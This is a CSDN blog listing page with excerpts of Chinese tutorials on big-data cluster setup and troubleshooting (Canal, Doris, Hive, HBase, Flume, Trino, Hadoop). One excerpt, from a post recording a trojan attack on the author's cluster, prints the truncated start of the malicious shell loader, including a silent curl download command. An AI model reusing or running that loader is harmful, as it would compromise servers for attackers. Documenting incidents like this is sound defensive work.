薛定谔的猫不吃猫粮-CSDN博客

原创手把手教你监控canal高可用集群的同步进度附实现思路、实现过程和相关的脚本

canal高可用集群我们搭建好了，集群相对来说比较稳定。在实际使用中发生过数据峰值较大、网络带宽不足等原因导致的数据同步延时较大，影响了业务开展。那么咱们有没有办法监控一下cananl的同步进度？附带实现思路，实现步骤和相关脚本

2023-04-14 17:32:06 677

原创手把手教你生产环境搭建Canal1.1.5高可用集群

手把手教你生产环境搭建Canal1.1.5高可用集群

2023-03-22 14:46:29 1244

原创手把手教你快速在生产环境搭建Doris集群附集群启停管理脚本

手把手教你快速在生产环境搭建Doris集群

2023-03-17 15:54:44 4036

原创手把手教你datart集成hive3.1.2

datart中是没有hive驱动包的，需要我们自己根据hive版本，放入合适驱动包和相关的其他jar包。

2022-09-28 14:36:32 2440

原创 ranger_core_db_mysql.sql file import failed

异常信息：Error executing: CREATE FUNCTION `getXportalUIdByLoginId`(input_val VARCHAR(100)) RETURNS int(11) BEGIN DECLARE myid INT; SELECT x_portal_user.id into myid FROM x_portal_user WHERE x_portal_user.login_id = input_val; RETURN myid; END java.sql.SQLEx

2022-04-01 10:42:12 901

原创 FlinkCDC的2.2.0版本怎么监控库中的所有表，增加新表到已有任务？

FlinkCDC的2.2.0版本怎么监控库中的所有表，增加新表到已有任务？一、监控全表千呼万唤始出来，之前预告FlinkCDC的2.2.0支持Flink1.14和添加新表,满怀希望！今天一看略显失望，添加新表，不支持动态添加，需要修改tableList之后，从ck中重启，倒是不用重新写新代码了，但是不满足我们目前的需求，失望之一。二是，api改得有点随意了。2.0版本监控全表，tableList不设置就行了 DebeziumSourceFunction<String>

2022-03-29 17:13:32 6984 6

原创 Exception in thread “Thread-6“ java.lang.IllegalStateException: Trying to access closed classloader.

问题：Exception in thread “Thread-6” java.lang.IllegalStateException: Trying to access closed classloader. Please check if you store classloaders directly or indirectly in static fields. If the stacktrace suggests that the leak occurs in a third party librar

2022-03-17 15:34:35 6871

原创 Hive 不同级别日志配置 hive-log4j2.properties

# Licensed to the Apache Software Foundation (ASF) under one# or more contributor license agreements. See the NOTICE file# distributed with this work for additional information# regarding copyright ownership. The ASF licenses this file# to you under

2022-02-08 17:03:24 2424 1

原创记录一次集群被木马病毒攻击

木马脚本O1W2iZnBuRhYbZy5EhkdHYabZ2gaLFkjexec &>/dev/nullexport PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbind=$(grep x:$(id -u): /etc/passwd|cut -d: -f6) c=$(echo "curl -4fsSLkA- -m200")t=$(echo "fjuoqusekcob5av5rw

2021-12-24 18:00:18 775

原创定位hdfs文件块异常和修复org.apache.hadoop.hdfs.CannotObtainBlockLengthException Cannot obtain block length for

hadoop定位hdfs文件块异常和修复org.apache.hadoop.hdfs.CannotObtainBlockLengthException: Cannot obtain block length for LocatedBlock一、问题重启hadoop集群之后,执行任务时发生异常异常信息 Error: java.io.IOException: org.apache.hadoop.hdfs.CannotObtainBlockLengthException: Cannot obtain bl

2021-11-25 13:35:10 2090

原创分区修复失败的问题 FAILED: Execution Error, return code 1 from org.apache.hadoop.hive.ql.exec.DDLTask

分区修复失败的问题 FAILED: Execution Error, return code 1 from org.apache.hadoop.hive.ql.exec.DDLTask一、问题在把CDH集群上的数据迁移到apache集群上时，遇到错误，记录一下。1.脚本执行的时候报错INFO : Compiling command(queryId=hadoop_20211123141935_050bb456-601d-4f8d-bb3c-0b274461b4f8): msck repair tab

2021-11-23 14:49:02 5037 1

原创解决 Error: java.io.EOFException: Premature EOF from inputStream 问题

解决 Error: java.io.EOFException: Premature EOF from inputStream 问题一、问题1.问题过程在日志解析任务过程中，突发报错，任务一直都很稳定，怎么回突然报错了呢？心头一紧2.详细错误类型：查看日志发现如下错误21/11/18 14:36:29 INFO mapreduce.Job: Task Id : attempt_1628497295151_1290365_m_000002_2, Status : FAILEDError: java

2021-11-18 15:21:07 2075

原创 flume采集日志异常停止之后自动重启

由于业务端日志采集格式不规范，经常会产生各种异常导致flume停止工作，如果对这些参数格式一一进行校验，影响采集速度，日志数据有一定的容错性。编一个一个脚本，不断监控flume运行状况，遇到异常，自动重启flume。#!/bin/bash export FLUME_HOME=/opt/flumewhile truedopc=`ps -ef | grep kafka-flume-hdfs.conf | grep -v "grep" | wc -l` if [[ $pc -lt 1 ]]the

2021-10-15 15:57:13 1024

原创 linux下查看lzo格式压缩文件的内容

linux下查看lzo格式压缩文件的内容1.安装lzop使用yum安装命令：yum install lzop[root@cm bin]# yum install lzopLoaded plugins: fastestmirror, securitySetting up Install ProcessDetermining fastest mirrorsepel/metalink

2021-07-01 16:11:50 641

原创 Ranger无法连接双主Mysql的问题 This function has none of DETERMINISTIC

解决Ranger无法连接双主Mysql的问题一、问题描述报错信息ERROR 1418 (HY000): This function has none of DETERMINISTIC, NO SQL, or READS SQL DATA in its declaration and binary logging is enabled (you *might* want to use the less safe log_bin_trust_function_creators variable)问题分

2021-06-24 16:31:30 234

原创修改hbase日志路径

修改hbase日志路径为了方便大数据集群日志管理，需要修改hbase日志路径1.错误示范找到配置文件：log4j.properties修改HBase日志路径vim log4j.properties 修改为hbase.log.dir=/var/log/hbase重启HBase集群什么？？？！！没有生效2.正确修改查阅官方配置发现需要修改hbase-env.shvim hbase-env.sh相关内容修改为export HBASE_LOG_DIR=/var/log/hbase

2021-06-17 16:08:05 1049

原创高可用Hive配置多客户端多用户模式

高可用HIve配置多客户端hive高可用搭建完毕了，但是如果想在其他节点连接hive怎么办呢？这个时候我们就需要在其他节点安装hive的客户端高可用hive的搭建参考我的另一篇文章hive高可用搭建1.复制安装文件将hdp14的安装文件复制到要连接hive的节点hdp16[along@hdp14 bigdata]$ scp -r hive along@hdp16:/opt/bigdata/2.修改核心配置连接hdp16，添加配置文件[along@hdp16 hive]$ pwd/op

2021-06-17 12:31:04 724 4

原创 DataGrip连接Presto 详细图文教程

DataGrip连接Presto为了提升即席查询能力，我为公司搭建了Presto集群。使用命令行客户端连接或者yanagishima开源工具连接不太方便。网上的资料不是很多，记录下来，方便需要的同学们。选择Presto的理由：1. Impala Presto 查询性能远远优于hive，可实现秒级查询2. 常规的计算任务，交给hive定时计算，使用Presto或 Impala来处理临时计算需求3. Impala性能稍领先于Presto，Presto在数据源支持上非常丰富4.

2021-06-10 15:13:08 1953 3

原创即席查询之Trino357编译安装部署集群启停脚本编写 yanagishima编译包下载

Trino安装部署1.下载安装包当前版本要求jdk11以上下载jdkopen jdk11当前版本不能用，官网推荐使用 Azul Zuluhttps://www.injdk.cn/将zulu11.43.55-ca-jdk11.0.9.1-linux_x64.tar.gz上传到服务器解压到**/opt/bigdata**目录[along@hdp16 resource]$ tar -zxvf zulu11.43.55-ca-jdk11.0.9.1-linux_x64.tar.gz -C /opt/

2021-06-10 13:48:31 1252

原创大数据集群监控之Zabbix安装（详细教程）

Zabbix安装节点规划进程hdp11节点hdp12节点hdp13zabbix-agent√√√zabbix-server√MySQL√zabbix-web√1.环境准备关闭集群关闭自己集群运行的大数据组件关闭防火墙参考我写的hadoop高可用搭建关闭SELinux参考我写的hadoop高可用搭建数据库安装参考我写的hive高可用搭建设置Xshell打开Xshell窗口,底部设置命令发送到所有会话2.安装yu

2021-06-03 17:41:23 436

原创 HBase2.2.7从源码编译到高可用部署整合整合Phoenix5.1.0 二级索引整合hive3.1.2

HBase源码编译与安装配置HBase是一种分布式、可扩展、支持海量数据存储的NoSQL数据库。高可靠/高性能/面向列/可伸缩的分布式文件存储系统。Hbase源码编译1.环境配置jdk，maven安装配置2.下载下载地址：https://hbase.apache.org/downloads.html3.上传解压将下载的源码包上传到/opt/src目录下并解压[root@localhost src]#tar -zxvf hbase-2.2.7-src.tar.gz4.选择hado

2021-05-31 15:02:30 899 1

原创解决HBase整合Hive时一直连接地址为localhost2181的zookeeper的问题

解决HBase整合Hive时一直连接地址为localhost:2181的zookeeper的问题问题描述我在搭建HBase集群整合hive的时候，hive一直连接本地的zookeeper，而不是连接HBase集群中配置的zk地址1.HBase起初以为HBase中hbase-env.sh 这个配置没有生效，export HBASE_MANAGES_ZK=false反复检查了配置，应该是没有问题2.Hive检查hive中的zookeeper，也是没有问题的。最后发现hbase.zookee

2021-05-31 14:51:13 2073

原创 Apache hive 3.1.2从单机到高可用部署 HiveServer2高可用 Metastore高可用 hive on spark hiveserver2 web UI 高可用集群启动脚本

hive部署下载apache hive 3.1.2http://archive.apache.org/dist/hive/注：先看hive编译文档，使用编译好的安装包进行部署官方的hive3.1.4和sprk3.0.0不兼容，需要重新编译。后面配置hive on spark 可以使用spark2.3.0。而spark2.3.0对应的hadoop版本是2.x。重新编译，参考本人写的另一篇文章hive3.1.4源码编译兼容spark3.0.0 hive on spark 升级guava版本兼容

2021-05-21 16:34:59 2572 5

原创 hive3.1.4源码编译兼容spark3.0.0 hive on spark hadoop3.x修改源码依赖步骤详细

hive编译自从CDH宣布收费之后，公司决定使用开源的组件，对现有的大数据集群进行替换。使用hive3.1.2和spark3.0.0配置hive on spark的时候，发现官方下载的hive3.1.2和spark3.0.0不兼容，hive3.1.2对应的版本是spark2.3.0，而spark3.0.0对应的hadoop版本是hadoop2.6或hadoop2.7。所以，如果想要使用高版本的hive和hadoop，我们要重新编译hive，兼容spark3.0.0。目前，有关hive3.1.2编译的

2021-05-21 16:13:35 7557 15

原创解决hadoop高可用使用start-dfs.sh脚本启动时namenode启动不了的问题

解决hadoop高可用，脚本启动时namenode启动不了的问题在通过使用hadoop提供的脚本 sbin/start-dfs.sh 启动hdfs时，经常发现高可用的namenode之启动了一个查看错误日志发现STARTUP_MSG: Starting NameNodeSTARTUP_MSG: host = hdp14/192.168.204.14STARTUP_MSG: args = []STARTUP_MSG: version = 3.1.4STARTUP_MSG: cla

2021-05-13 16:57:49 4051

原创解决hadoop执行MapReduce程序时Ha和yarn的冲突 YarnRuntimeException: java.lang.NullPointerException

解决hadoop执行MapReduce程序时Ha和yarn的冲突错误信息：YarnRuntimeException: java.lang.NullPointerException在hadoop高可用环境下执行MR程序报如下错误：2020-04-09 22:56:58,827 ERROR [Listener at 0.0.0.0/45871] org.apache.hadoop.mapreduce.v2.app.MRAppMaster: Error starting MRAppMasterorg.ap

2021-05-13 15:25:20 1185 1

原创 hadoop 如何判断文件是否存在，目录是否存在，目录是否为空？

hadoop 如何判断文件是否存在，目录是否存在，目录是否为空？之前在做日志收集的时候遇见一个问题，一直没有解决，今天偶然间想起来这个问题解决一下。将hdfs上的日志数据使用load命令加载到hive表中时，极少数情况下当某种日志缺失的时候，这种日志对应的路径为空，加载的时候会中断调度任务。在Linux文件系统中，可以使用下面的Shell脚本判断某个文件是否存在：# 这里的-f参数判断$file是否存在 if [ ! -f "$file" ]; then　　echo "文件不存在!"fi

2021-05-12 18:02:31 4950

转载 MySQL生成整年日期表（不用函数和存储过程）

转载自https://blog.csdn.net/ZZQHELLO2018/article/details/105227714-- 创建小数据表 0-9DROP TABLE IF EXISTS aa_numbers_small;CREATE TABLE aa_numbers_small( number INT);--插入数据INSERT INTO aa_numbers_small VALUES(0),(1),(2),(3),(4),(5),(6),(7),(8),(9);SELECT

2021-05-11 17:41:51 892

原创 SecondaryNameNode与Hadoop高可用（HA）的区别

一、SecondaryNameNode介绍要了解Secondary NameNode之前，我们先来看看NameNode是做什么的。NameNodeNameNode：主要用来保存HDFS的元数据信息，比如命名空间信息，块信息等。当它运行的时候，这些信息在内存，也可以持久化到磁盘上。如果存储在NameNode节点的磁盘中，因为经常需要进行随机访问，还有响应客户请求，必然是效率过低。因此，元数据需要存放在内存中。但如果只存在内存中，一旦断电，元数据丢失，整个集群就无法工作了。因此产生在磁盘中备份元数据的Fs

2021-05-08 17:05:25 635

apache-hive-3.1.2-bin.tar.gz

apache-hive-3.1.2-jdbc.jar

yanagishima-18.0.rar

yanagishima-22.0-build.zip

Google-大数据相关的3篇论文中文翻译.zip

空空如也